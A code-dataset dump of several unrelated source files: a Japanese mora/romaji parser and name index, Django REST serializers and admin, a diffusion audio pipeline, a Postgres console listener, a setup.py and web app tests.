Mora('ni', 'ニ', '\uff86', 'に', 'ni', '+ny'),
Mora('nu', 'ヌ', '\uff87', 'ぬ', 'nu'),
Mora('ne', 'ネ', '\uff88', 'ね', 'ne'),
Mora('no', 'ノ', '\uff89', 'の', 'no'),
Mora('ha', 'ハ', '\uff8a', 'は', 'ha'),
Mora('hi', 'ヒ', '\uff8b', 'ひ', 'hi', '+hy'),
Mora('hu', 'フ', '\uff8c', 'ふ', '!hu', 'fu', '+hu', '+f'),
Mora('he', 'ヘ', '\uff8d', 'へ', 'he'),
Mora('ho', 'ホ', '\uff8e', 'ほ', 'ho'),
Mora('ma', 'マ', '\uff8f', 'ま', 'ma'),
Mora('mi', 'ミ', '\uff90', 'み', 'mi', '+my'),
Mora('mu', 'ム', '\uff91', 'む', 'mu', '+m'),
Mora('me', 'メ', '\uff92', 'め', 'me'),
Mora('mo', 'モ', '\uff93', 'も', 'mo'),
Mora('ya', 'ヤ', '\uff94', 'や', 'ya'),
Mora('yu', 'ユ', '\uff95', 'ゆ', 'yu'),
Mora('ye', 'イェ', '\uff72\uff6a', 'いぇ', 'ye'),
Mora('yo', 'ヨ', '\uff96', 'よ', 'yo'),
Mora('ra', 'ラ', '\uff97', 'ら', 'ra', '+la'),
Mora('ri', 'リ', '\uff98', 'り', 'ri', '+li', '+ry', '+ly'),
Mora('ru', 'ル', '\uff99', 'る', 'ru', '+lu', '+r', '+l'),
Mora('re', 'レ', '\uff9a', 'れ', 're', '+le'),
Mora('ro', 'ロ', '\uff9b', 'ろ', 'ro', '+lo'),
Mora('wa', 'ワ', '\uff9c', 'わ', 'wa'),
Mora('wi', 'ウィ', '\uff73\uff68', 'うぃ', 'whi', '+wi', '+wy', '+why'),
Mora('we', 'ウェ', '\uff73\uff6a', 'うぇ', 'whe', '+we'),
Mora('wo', 'ウォ', '\uff73\uff6b', 'うぉ', 'who'),
Mora('Wi', 'ヰ', None, 'ゐ', '!wi'),
Mora('We', 'ヱ', None, 'ゑ', '!we'),
Mora('Wo', 'ヲ', '\uff66', 'を', 'wo'),
# Special moras: They don't have actual pronunciation,
# but we keep them for IMEs.
Mora('xW', 'ァ', '\uff67', 'ぁ', '!xa', '!la'),
Mora('xI', 'ィ', '\uff68', 'ぃ', '!xi', '!li'),
Mora('xV', 'ゥ', '\uff69', 'ぅ', '!xu', '!lu'),
Mora('xE', 'ェ', '\uff6a', 'ぇ', '!xe', '!le'),
Mora('xR', 'ォ', '\uff6b', 'ぉ', '!xo', '!lo'),
Mora('xA', 'ャ', '\uff6c', 'ゃ', '!xya', '!lya'),
Mora('xU', 'ュ', '\uff6d', 'ゅ', '!xyu', '!lyu'),
Mora('xO', 'ョ', '\uff6e', 'ょ', '!xyo', '!lyo'),
# chouon
Mora('x-', 'ー', '\uff70', 'ー', '!x-', '+h'),
# choked sound (Sokuon)
Mora('.t', 'ッ', '\uff6f', 'っ', '!xtu', '!ltu',
'k:k', 's:s', 't:t', 'h:h', 'f:f', 'm:m', 'r:r',
'g:g', 'z:z', 'j:j', 'd:d', 'b:b', 'v:v', 'b:c', 't:c'),
# voiced (Dakuon)
Mora('ga', 'ガ', '\uff76\uff9e', 'が', 'ga'),
Mora('gi', 'ギ', '\uff77\uff9e', 'ぎ', 'gi', '+gy'),
Mora('gu', 'グ', '\uff78\uff9e', 'ぐ', 'gu', '+g'),
Mora('ge', 'ゲ', '\uff79\uff9e', 'げ', 'ge'),
Mora('go', 'ゴ', '\uff7a\uff9e', 'ご', 'go'),
Mora('za', 'ザ', '\uff7b\uff9e', 'ざ', 'za'),
Mora('zi', 'ジ', '\uff7c\uff9e', 'じ', '!zi', 'ji', '+zi'),
Mora('zu', 'ズ', '\uff7d\uff9e', 'ず', 'zu', '+z'),
Mora('ze', 'ゼ', '\uff7e\uff9e', 'ぜ', 'ze'),
Mora('zo', 'ゾ', '\uff7f\uff9e', 'ぞ', 'zo'),
Mora('da', 'ダ', '\uff80\uff9e', 'だ', 'da'),
Mora('di', 'ヂ', '\uff81\uff9e', 'ぢ', '!di', 'dzi'),
Mora('du', 'ヅ', '\uff82\uff9e', 'づ', '!du', 'dzu'),
Mora('de', 'デ', '\uff83\uff9e', 'で', 'de'),
Mora('do', 'ド', '\uff84\uff9e', 'ど', 'do', '+d'),
Mora('ba', 'バ', '\uff8a\uff9e', 'ば', 'ba'),
Mora('bi', 'ビ', '\uff8b\uff9e', 'び', 'bi', '+by'),
Mora('bu', 'ブ', '\uff8c\uff9e', 'ぶ', 'bu', '+b'),
Mora('be', 'ベ', '\uff8d\uff9e', 'べ', 'be'),
Mora('bo', 'ボ', '\uff8e\uff9e', 'ぼ', 'bo'),
# p- sound (Handakuon)
Mora('pa', 'パ', '\uff8a\uff9f', 'ぱ', 'pa'),
Mora('pi', 'ピ', '\uff8b\uff9f', 'ぴ', 'pi', '+py'),
Mora('pu', 'プ', '\uff8c\uff9f', 'ぷ', 'pu', '+p'),
Mora('pe', 'ペ', '\uff8d\uff9f', 'ぺ', 'pe'),
Mora('po', 'ポ', '\uff8e\uff9f', 'ぽ', 'po'),
# double consonants (Youon)
Mora('KA', 'キャ', '\uff77\uff6c', 'きゃ', 'kya'),
Mora('KU', 'キュ', '\uff77\uff6d', 'きゅ', 'kyu', '+cu'),
Mora('KE', 'キェ', '\uff77\uff6a', 'きぇ', 'kye'),
Mora('KO', 'キョ', '\uff77\uff6e', 'きょ', 'kyo'),
Mora('kA', 'クァ', '\uff78\uff67', 'くぁ', 'qa'),
Mora('kI', 'クィ', '\uff78\uff68', 'くぃ', 'qi'),
Mora('kE', 'クェ', '\uff78\uff6a', 'くぇ', 'qe'),
Mora('kO', 'クォ', '\uff78\uff6b', 'くぉ', 'qo'),
Mora('SA', 'シャ', '\uff7c\uff6c', 'しゃ', '!sya', 'sha', '+sya'),
Mora('SU', 'シュ', '\uff7c\uff6d', 'しゅ', '!syu', 'shu', '+syu', '+sh'),
Mora('SE', 'シェ', '\uff7c\uff6a', 'しぇ', '!sye', 'she', '+sye'),
Mora('SO', 'ショ', '\uff7c\uff6e', 'しょ', '!syo', 'sho', '+syo'),
Mora('CA', 'チャ', '\uff81\uff6c', 'ちゃ', '!tya', '!cya', 'cha'),
Mora('CU', 'チュ', '\uff81\uff6d', 'ちゅ', '!tyu', '!cyu', 'chu'),
Mora('CE', 'チェ', '\uff81\uff6a', 'ちぇ', '!tye', '!cye', 'che'),
Mora('CO', 'チョ', '\uff81\uff6e', 'ちょ', '!tyo', '!cyo', 'cho'),
Mora('TI', 'ティ', '\uff83\uff68', 'てぃ', '!tyi', '+ti'),
Mora('TU', 'テュ', '\uff83\uff6d', 'てゅ', '!thu', '+tu'),
Mora('TO', 'トゥ', '\uff84\uff69', 'とぅ', '!tho', '+two'),
Mora('NA', 'ニャ', '\uff86\uff6c', 'にゃ', 'nya'),
Mora('NU', 'ニュ', '\uff86\uff6d', 'にゅ', 'nyu'),
Mora('NI', 'ニェ', '\uff86\uff6a', 'にぇ', 'nye'),
Mora('NO', 'ニョ', '\uff86\uff6e', 'にょ', 'nyo'),
Mora('HA', 'ヒャ', '\uff8b\uff6c', 'ひゃ', 'hya'),
Mora('HU', 'ヒュ', '\uff8b\uff6d', 'ひゅ', 'hyu'),
Mora('HE', 'ヒェ', '\uff8b\uff6a', 'ひぇ', 'hye'),
Mora('HO', 'ヒョ', '\uff8b\uff6e', 'ひょ', 'hyo'),
Mora('FA', 'ファ', '\uff8c\uff67', 'ふぁ', 'fa'),
Mora('FI', 'フィ', '\uff8c\uff68', 'ふぃ', 'fi', '+fy'),
Mora('FE', 'フェ', '\uff8c\uff6a', 'ふぇ', 'fe'),
Mora('FO', 'フォ', '\uff8c\uff6b', 'ふぉ', 'fo'),
Mora('FU', 'フュ', '\uff8c\uff6d', 'ふゅ', 'fyu'),
Mora('Fo', 'フョ', '\uff8c\uff6e', 'ふょ', 'fyo'),
Mora('MA', 'ミャ', '\uff90\uff6c', 'みゃ', 'mya'),
Mora('MU', 'ミュ', '\uff90\uff6d', 'みゅ', 'myu'),
Mora('ME', 'ミェ', '\uff90\uff6a', 'みぇ', 'mye'),
Mora('MO', 'ミョ', '\uff90\uff6e', 'みょ', 'myo'),
Mora('RA', 'リャ', '\uff98\uff6c', 'りゃ', 'rya', '+lya'),
Mora('RU', 'リュ', '\uff98\uff6d', 'りゅ', 'ryu', '+lyu'),
Mora('RE', 'リェ', '\uff98\uff6a', 'りぇ', 'rye', '+lye'),
Mora('RO', 'リョ', '\uff98\uff6e', 'りょ', 'ryo', '+lyo'),
# double consonants + voiced
Mora('GA', 'ギャ', '\uff77\uff9e\uff6c', 'ぎゃ', 'gya'),
Mora('GU', 'ギュ', '\uff77\uff9e\uff6d', 'ぎゅ', 'gyu'),
Mora('GE', 'ギェ', '\uff77\uff9e\uff6a', 'ぎぇ', 'gye'),
Mora('GO', 'ギョ', '\uff77\uff9e\uff6e', 'ぎょ', 'gyo'),
Mora('Ja', 'ジャ', '\uff7c\uff9e\uff6c', 'じゃ', 'ja', 'zya'),
Mora('Ju', 'ジュ', '\uff7c\uff9e\uff6d', 'じゅ', 'ju', 'zyu'),
Mora('Je', 'ジェ', '\uff7c\uff9e\uff6a', 'じぇ', 'je', 'zye'),
Mora('Jo', 'ジョ', '\uff7c\uff9e\uff6e', 'じょ', 'jo', 'zyo'),
Mora('JA', 'ヂャ', '\uff81\uff9e\uff6c', 'ぢゃ', 'zha'),
Mora('JU', 'ヂュ', '\uff81\uff9e\uff6d', 'ぢゅ', 'zhu'),
Mora('JE', 'ヂェ', '\uff81\uff9e\uff6a', 'ぢぇ', 'zhe'),
Mora('JO', 'ヂョ', '\uff81\uff9e\uff6e', 'ぢょ', 'zho'),
Mora('dI', 'ディ', '\uff83\uff9e\uff68', 'でぃ', '+di', 'dyi'),
Mora('dU', 'デュ', '\uff83\uff9e\uff6d', 'でゅ', '+du', 'dyu', 'dhu'),
Mora('dO', 'ドゥ', '\uff84\uff9e\uff69', 'どぅ', 'dho'),
Mora('BA', 'ビャ', '\uff8b\uff9e\uff6c', 'びゃ', 'bya'),
Mora('BU', 'ビュ', '\uff8b\uff9e\uff6d', 'びゅ', 'byu'),
Mora('BE', 'ビェ', '\uff8b\uff9e\uff6a', 'びぇ', 'bye'),
Mora('BO', 'ビョ', '\uff8b\uff9e\uff6e', 'びょ', 'byo'),
Mora('va', 'ヴァ', '\uff73\uff9e\uff67', 'う゛ぁ', 'va'),
Mora('vi', 'ヴィ', '\uff73\uff9e\uff68', 'う゛ぃ', 'vi', '+vy'),
Mora('vu', 'ヴ', '\uff73\uff9e', 'う゛', 'vu', '+v'),
Mora('ve', 'ヴェ', '\uff73\uff9e\uff6a', 'う゛ぇ', 've'),
Mora('vo', 'ヴォ', '\uff73\uff9e\uff6b', 'う゛ぉ', 'vo'),
# double consonants + p-sound
Mora('PA', 'ピャ', '\uff8b\uff9f\uff6c', 'ぴゃ', 'pya'),
Mora('PU', 'ピュ', '\uff8b\uff9f\uff6d', 'ぴゅ', 'pyu'),
Mora('PE', 'ピェ', '\uff8b\uff9f\uff6a', 'ぴぇ', 'pye'),
Mora('PO', 'ピョ', '\uff8b\uff9f\uff6e', 'ぴょ', 'pyo'),
)
KEY2MORA = { m.mid:m for m in ALL }
## Mora Parser
##
class MoraParser:
def __init__(self):
self._tree = {}
for m in MoraTable.ALL:
for k in (m.zenk, m.hank, m.zenh):
if k is None: continue
self.add(k, m, allowConflict=True)
return
def add(self, s, m, allowConflict=False):
#print('add:', s, m)
t0 = self._tree
(s0,_,s1) = s.partition(':')
for c in (s0+s1)[:-1]:
if c in t0:
(_,_,t1) = t0[c]
else:
t1 = {}
t0[c] = (None, None, t1)
t0 = t1
c = (s0+s1)[-1]
if c in t0:
(obj,_,t1) = t0[c]
if obj is not None and not allowConflict:
raise ValueError('already defined: %r' % s)
else:
t1 = {}
t0[c] = (m, s0, t1)
return
def parse(self, s, i0=0):
i1 = i0
t0 = self._tree
m = s0 = None
while i1 < len(s):
c = s[i1].lower()
if c in t0:
(m,s0,t1) = t0[c]
i1 += 1
t0 = t1
elif m is not None:
yield (s[i0:i1], m)
i0 = i1 = i0+len(s0)
t0 = self._tree
m = s0 = None
else:
yield (s[i1], None)
i0 = i1 = i1+1
t0 = self._tree
if m is not None:
yield (s[i0:], m)
return
class MoraParserOfficial(MoraParser):
def __init__(self):
MoraParser.__init__(self)
for m in MoraTable.ALL:
for k in m.roff:
self.add(k, m)
self.add('nn', MoraTable.MORA_NN)
return
class MoraParserOfficialAnna(MoraParser):
def __init__(self):
MoraParser.__init__(self)
for m in MoraTable.ALL:
for k in m.roff:
self.add(k, m)
self.add('n', MoraTable.MORA_NN)
return
class MoraParserEnglish(MoraParser):
def __init__(self):
MoraParser.__init__(self)
for m in MoraTable.ALL:
for k in m.reng:
self.add(k, m)
return
## String Generator
##
class StringGenerator:
def generate(self, seq):
s = ''
m1 = None
for m2 in seq:
if m1 is None:
pass
elif isinstance(m1, Mora):
s += self.convert(m1, m2)
else:
s += m1
m1 = m2
if m1 is None:
pass
elif isinstance(m1, Mora):
s += self.convert(m1, None)
else:
s += m1
return s
def convert(self, m1, m2=None):
return m1.zenk
class GeneratorOfficial(StringGenerator):
def convert(self, m1, m2=None):
if m1.mid == '.t':
if isinstance(m2, Mora):
k = m2.roff[0]
return k[0] # double the consonant
return 't'
elif m1.mid == '.n':
if not isinstance(m2, Mora) or m2.mid[0] not in '.ynN':
return 'n' # NN+C -> "n"+C
return m1.roff[0]
class GeneratorOfficialAnna(StringGenerator):
def convert(self, m1, m2=None):
if m1.mid == '.t':
if isinstance(m2, Mora):
k = m2.roff[0]
return k[0] # double the consonant
return 't'
elif m1.mid == '.n':
if not isinstance(m2, Mora) or m2.mid[0] not in '.y':
return 'n' # NN+C -> "n"+C
return m1.roff[0]
class GeneratorEnglish(StringGenerator):
def convert(self, m1, m2=None):
if m1.mid == '.t':
if isinstance(m2, Mora):
k = m2.reng[0]
if not k.startswith('c'):
return k[0] # double the consonant
return 't'
elif m1.mid == '.n':
if isinstance(m2, Mora) and m2.mid[0] in 'pP':
return 'm' # NN+"p" -> "mp"
elif not isinstance(m2, Mora) or m2.mid[0] not in '.y':
return 'n' # NN+C -> "n"+C
return m1.reng[0]
PARSE_ENGLISH = MoraParserEnglish()
GEN = StringGenerator()
GEN_ENGLISH = GeneratorEnglish()
# expand(s): Expand features
def expand(s):
words = []
w = ''
for c in s:
if c.isalpha():
w += c
elif w:
words.append(w)
w = ''
if w:
words.append(w)
a = []
for w in words:
a.append(w.lower())
w1 = w2 = ''
for (s,m) in PARSE_ENGLISH.parse(w):
if m is not None:
w1 += m.zenk
w2 += m.reng[0].lower()
if w1:
a.append(w1)
if w2:
a.append(w2)
for w1 in a:
yield w1
if "'" in w1:
yield w1.replace("'",'')
for w2 in a:
if w1 != w2:
w = w1+w2
yield w
if "'" in w:
yield w.replace("'",'')
return
class IndexDB:
def __init__(self):
self.index = {}
return
def add(self, name, uid):
# name -> {feats} -> uid
feats = set(expand(name))
for f in feats:
self.addraw(f, uid)
return
def addraw(self, feat, uid):
if feat in self.index:
a = self.index[feat]
else:
a = self.index[feat] = set()
a.add(uid)
return
def lookup(self, name):
# name -> {feats} -> uid
feats = set(expand(name))
uids = None
for f in feats:
if f not in self.index: continue
a = self.index[f]
if uids is None:
uids = a
else:
uids = uids.intersection(a)
return uids
def main(argv):
import getopt
def usage():
print('usage: %s [-i input] [-p HH:MM[-HH:MM]] [file ...]' % argv[0])
return 100
try:
(opts, args) = getopt.getopt(argv[1:], 'i:p:')
except getopt.GetoptError:
return usage()
db = IndexDB()
r0 = r1 = None
for (k, v) in opts:
if k == '-i':
path = v
if path.endswith('.csv'):
with open(path, encoding='cp932') as fp:
table = list(csv.reader(fp))
for row in table[1:]:
uid = row[2]
db.addraw(row[2], uid)
db.add(row[3], uid)
db.add(row[4], uid)
else:
with open(path) as fp:
for line in fp:
(line,_,_) = line.strip().partition('#')
if not line: continue
f = line.split()
uid = f.pop(0)
for w in f:
db.add(w, uid)
elif k == '-p':
(t1,_,t2) = v.partition('-')
(h,_,m) = t1.partition(':')
r1 = r0 = time(int(h), int(m))
if t2:
(h,_,m) = t2.partition(':')
r1 = time(int(h), int(m))
assert r0 <= r1
for path in args:
with open(path) as fp:
table = list(csv.reader(fp))
for row in table[1:]:
name = row[0]
dt0 = datetime.strptime(row[2], '%Y/%m/%d %H:%M:%S')
dt1 = datetime.strptime(row[3], '%Y/%m/%d %H:%M:%S')
t0 = dt0.time()
t1 = dt1.time()
if r0 is not None and (t1 < r0 or r1 < t0): continue
uids = db.lookup(name)
if uids is None:
print(f'# notfound: {name}')
elif 2 < len(uids):
print(f'# ambiguous: {name} {uids}')
else:
uid = list(uids)[0]
print(f'{uid} # {name}')
return 0
if __name__ == '__main__': sys.exit(main(sys.argv))
| [
"yusuke@shinyama.jp"
] | yusuke@shinyama.jp |
d6e06778da1716fbaaf68b4e91319ac1c219ef43 | daaf133cc4146ecd3b0df5ceafea84daa6bac2ce | /project/notes/serializers.py | 085cf9d4da8d8d79ed810d541f550edae69f4dcb | [] | no_license | core-api/heroku-app | 8c29452c609e4ff2344542e1e952a343f29953f6 | 7f03a36dc34baddcdf4cda8534ab800a98e079c9 | refs/heads/master | 2023-07-20T05:34:25.707890 | 2016-01-20T12:32:12 | 2016-01-20T12:32:12 | 32,865,301 | 1 | 0 | null | 2016-01-20T12:23:01 | 2015-03-25T13:11:06 | Python | UTF-8 | Python | false | false | 326 | py | from rest_framework import serializers
class AddNoteSerializer(serializers.Serializer):
description = serializers.CharField(max_length=100)
class EditNoteSerializer(serializers.Serializer):
description = serializers.CharField(max_length=100, required=False)
complete = serializers.BooleanField(required=False)
| [
"tom@tomchristie.com"
] | tom@tomchristie.com |
4b95149358f6dfefe0687c5d6e8ae4f54758fb4a | b74320ad439e37dfa48cd8db38dab3b7a20a36ff | /src/diffusers/pipelines/dance_diffusion/pipeline_dance_diffusion.py | b2d46c6f90f142635dec50da02b00fe63b3e40c2 | [
"Apache-2.0"
] | permissive | huggingface/diffusers | c82beba1ec5f0aba01b6744040a5accc41ec2493 | 5eeedd9e3336882d598091e191559f67433b6427 | refs/heads/main | 2023-08-29T01:22:52.237910 | 2023-08-28T18:16:27 | 2023-08-28T18:16:27 | 498,011,141 | 17,308 | 3,158 | Apache-2.0 | 2023-09-14T20:57:44 | 2022-05-30T16:04:02 | Python | UTF-8 | Python | false | false | 6,254 | py | # Copyright 2023 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, Optional, Tuple, Union
import torch
from ...utils import logging, randn_tensor
from ..pipeline_utils import AudioPipelineOutput, DiffusionPipeline
logger = logging.get_logger(__name__) # pylint: disable=invalid-name
class DanceDiffusionPipeline(DiffusionPipeline):
r"""
Pipeline for audio generation.
This model inherits from [`DiffusionPipeline`]. Check the superclass documentation for the generic methods
implemented for all pipelines (downloading, saving, running on a particular device, etc.).
Parameters:
unet ([`UNet1DModel`]):
A `UNet1DModel` to denoise the encoded audio.
scheduler ([`SchedulerMixin`]):
A scheduler to be used in combination with `unet` to denoise the encoded audio latents. Can be one of
[`IPNDMScheduler`].
"""
def __init__(self, unet, scheduler):
super().__init__()
self.register_modules(unet=unet, scheduler=scheduler)
@torch.no_grad()
def __call__(
self,
batch_size: int = 1,
num_inference_steps: int = 100,
generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None,
audio_length_in_s: Optional[float] = None,
return_dict: bool = True,
) -> Union[AudioPipelineOutput, Tuple]:
r"""
The call function to the pipeline for generation.
Args:
batch_size (`int`, *optional*, defaults to 1):
The number of audio samples to generate.
num_inference_steps (`int`, *optional*, defaults to 50):
The number of denoising steps. More denoising steps usually lead to a higher-quality audio sample at
the expense of slower inference.
generator (`torch.Generator`, *optional*):
A [`torch.Generator`](https://pytorch.org/docs/stable/generated/torch.Generator.html) to make
generation deterministic.
audio_length_in_s (`float`, *optional*, defaults to `self.unet.config.sample_size/self.unet.config.sample_rate`):
The length of the generated audio sample in seconds.
return_dict (`bool`, *optional*, defaults to `True`):
Whether or not to return a [`~pipelines.AudioPipelineOutput`] instead of a plain tuple.
Example:
```py
from diffusers import DiffusionPipeline
from scipy.io.wavfile import write
model_id = "harmonai/maestro-150k"
pipe = DiffusionPipeline.from_pretrained(model_id)
pipe = pipe.to("cuda")
audios = pipe(audio_length_in_s=4.0).audios
# To save locally
for i, audio in enumerate(audios):
write(f"maestro_test_{i}.wav", pipe.unet.sample_rate, audio.transpose())
# To dislay in google colab
import IPython.display as ipd
for audio in audios:
display(ipd.Audio(audio, rate=pipe.unet.sample_rate))
```
Returns:
[`~pipelines.AudioPipelineOutput`] or `tuple`:
If `return_dict` is `True`, [`~pipelines.AudioPipelineOutput`] is returned, otherwise a `tuple` is
returned where the first element is a list with the generated audio.
"""
if audio_length_in_s is None:
audio_length_in_s = self.unet.config.sample_size / self.unet.config.sample_rate
sample_size = audio_length_in_s * self.unet.config.sample_rate
down_scale_factor = 2 ** len(self.unet.up_blocks)
if sample_size < 3 * down_scale_factor:
raise ValueError(
f"{audio_length_in_s} is too small. Make sure it's bigger or equal to"
f" {3 * down_scale_factor / self.unet.config.sample_rate}."
)
original_sample_size = int(sample_size)
if sample_size % down_scale_factor != 0:
sample_size = (
(audio_length_in_s * self.unet.config.sample_rate) // down_scale_factor + 1
) * down_scale_factor
logger.info(
f"{audio_length_in_s} is increased to {sample_size / self.unet.config.sample_rate} so that it can be handled"
f" by the model. It will be cut to {original_sample_size / self.unet.config.sample_rate} after the denoising"
" process."
)
sample_size = int(sample_size)
dtype = next(self.unet.parameters()).dtype
shape = (batch_size, self.unet.config.in_channels, sample_size)
if isinstance(generator, list) and len(generator) != batch_size:
raise ValueError(
f"You have passed a list of generators of length {len(generator)}, but requested an effective batch"
f" size of {batch_size}. Make sure the batch size matches the length of the generators."
)
audio = randn_tensor(shape, generator=generator, device=self._execution_device, dtype=dtype)
# set step values
self.scheduler.set_timesteps(num_inference_steps, device=audio.device)
self.scheduler.timesteps = self.scheduler.timesteps.to(dtype)
for t in self.progress_bar(self.scheduler.timesteps):
# 1. predict noise model_output
model_output = self.unet(audio, t).sample
# 2. compute previous audio sample: x_t -> t_t-1
audio = self.scheduler.step(model_output, t, audio).prev_sample
audio = audio.clamp(-1, 1).float().cpu().numpy()
audio = audio[:, :, :original_sample_size]
if not return_dict:
return (audio,)
return AudioPipelineOutput(audios=audio)
| [
"noreply@github.com"
] | huggingface.noreply@github.com |
4fe98793df58d5e1bf85fc96af28a813a0e52817 | 906e8d5711f64b45db1541ea15ab5de50c73fafa | /src/api/listeners/console.py | 9ab2fd7769322fa1b97d3a3048b9ab91dc515ed7 | [
"MIT"
] | permissive | yagrxu/infrabox | 079cb2f04f13dc31811698fe94354e32e8ea91e1 | 1d8789db1968897fd471d4dbc1480395d365ff85 | refs/heads/master | 2021-04-15T10:31:54.697521 | 2018-03-21T21:48:12 | 2018-03-21T21:48:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,695 | py | import json
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT
from eventlet.hubs import trampoline
from pyinfraboxutils.db import connect_db
from pyinfraboxutils import dbpool
from pyinfraboxutils import get_logger
logger = get_logger('console_listener')
def __handle_event(event, socketio, client_manager):
job_id = event['job_id']
console_id = event['id']
if not client_manager.has_clients(job_id):
return
logger.info('start console %s', console_id)
conn = dbpool.get()
try:
r = conn.execute_one('''
SELECT output FROM console WHERE id = %s
''', [console_id])
logger.info('retrived console %s', console_id)
if not r:
return
r = r[0]
socketio.emit('notify:console', {
'data': r,
'job_id': job_id
}, room=job_id)
finally:
dbpool.put(conn)
logger.info('stop console %s', console_id)
def listen(socketio, client_manager):
while True:
try:
__listen(socketio, client_manager)
except Exception as e:
logger.exception(e)
def __listen(socketio, client_manager):
conn = connect_db()
conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
cur = conn.cursor()
cur.execute("LISTEN console_update")
while True:
trampoline(conn, read=True)
conn.poll()
while conn.notifies:
n = conn.notifies.pop()
socketio.start_background_task(__handle_event,
json.loads(n.payload),
socketio,
client_manager)
| [
"steffen@infrabox.net"
] | steffen@infrabox.net |
630e3b59bc97ae65efd9cdf123fa18dc17a216c8 | 69c81130633ba4d41b1ec938f0fc586f777e95ba | /setup.py | 7e3762cd896e38a132a848717fe69bc6b7b3c13b | [
"ISC"
] | permissive | pregiotek/drf-tracking | d8ff934e884e7908f997f524d4e363914c2f11b2 | f40c87a7e392009cdffa7b893e964b51f2faeb5b | refs/heads/master | 2021-01-18T07:51:57.961574 | 2016-09-09T14:34:44 | 2016-09-09T14:34:44 | 67,803,102 | 1 | 0 | null | 2016-09-09T13:54:10 | 2016-09-09T13:54:08 | Python | UTF-8 | Python | false | false | 2,771 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import os
import sys
from setuptools import setup
name = 'drf-tracking'
package = 'rest_framework_tracking'
description = 'Utils to log Django Rest Framework requests to the database'
url = 'https://github.com/aschn/drf-tracking'
author = 'Anna Schneider'
author_email = 'anna@WattTime.org'
license = 'BSD'
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
init_py = open(os.path.join(package, '__init__.py')).read()
return re.search("^__version__ = ['\"]([^'\"]+)['\"]",
init_py, re.MULTILINE).group(1)
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
version = get_version(package)
if sys.argv[-1] == 'publish':
if os.system("pip freeze | grep wheel"):
print("wheel not installed.\nUse `pip install wheel`.\nExiting.")
sys.exit()
os.system("python setup.py sdist upload")
os.system("python setup.py bdist_wheel upload")
print("You probably want to also tag the version now:")
print(" git tag -a {0} -m 'version {0}'".format(version))
print(" git push --tags")
sys.exit()
setup(
name=name,
version=version,
url=url,
license=license,
description=description,
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
install_requires=[],
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP',
]
)
| [
"annarschneider@gmail.com"
] | annarschneider@gmail.com |
970297db1b672f47016ec7d408bacef3cc4da9e3 | eec9299fd80ed057585e84e0f0e5b4d82b1ed9a7 | /user/admin.py | 0b8e5495afbf1e7b37d5a28a0f436f6a35c69dc8 | [] | no_license | aimiliya/mysite | f51967f35c0297be7051d9f485dd0e59b8bb60c2 | b8e3b639de6c89fb8e6af7ee0092ee744a75be41 | refs/heads/master | 2020-04-08T19:06:36.539404 | 2018-12-01T08:05:18 | 2018-12-01T08:05:18 | 159,640,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.admin import User
from .models import Profile
class ProfileInline(admin.StackedInline):
model = Profile
can_delete = False
class UserAdmin(BaseUserAdmin):
inlines = (ProfileInline,)
list_display = ('username', 'nickname', 'email', 'is_staff', 'is_active', 'is_superuser')
def nickname(self, obj):
return obj.profile.nickname
nickname.short_description = '昵称'
# Re-register UserAdmin
admin.site.unregister(User)
admin.site.register(User, UserAdmin)
@admin.register(Profile)
class ProfileAdmin(admin.ModelAdmin):
list_display = ('user', 'nickname') | [
"951416267@qq.com"
] | 951416267@qq.com |
99ed850db9f54ab4480a94c40c385368950b6d31 | 58f8ba80b7288aa762e114b9d6476ef911a64044 | /tests/level4-1/test_app2_responses.py | d6a6c8f99ee51d3aff9052118e8cb493c59dc8bf | [
"MIT"
] | permissive | hansroh/skitai | a3cc80b1b0ef152ee22926b40a5c22a872c4235d | c54990839a634544ae26ec2d2c2d755e2b34f99c | refs/heads/master | 2023-01-22T23:49:42.868422 | 2023-01-04T10:14:38 | 2023-01-04T10:14:38 | 77,034,278 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,067 | py | import requests
import platform
def test_app (launch):
with launch ("./examples/app2.py") as engine:
resp = engine.get ('/threaproducer')
assert resp.status_code == 200
assert len (resp.data) == 100000
resp = engine.get ('/map_in_thread')
assert resp.status_code == 200
assert resp.data == {'media': 'Hello'}
resp = engine.get ('/reindeer')
assert resp.headers.get ('etag')
assert resp.headers.get ('content-type') == 'image/jpeg'
assert resp.headers.get ('content-length') == '32772'
resp = engine.get ('/file')
assert resp.headers.get ('content-type') == 'application/octet-stream'
assert resp.headers.get ('content-length') == '32772'
resp = engine.get ('/stream')
assert resp.status_code == 210
assert resp.headers.get ('content-type') == 'text/plain'
assert resp.data.count (b'<CHUNK>') == 100
resp = engine.get ('/thread_future')
assert resp.status_code == 200
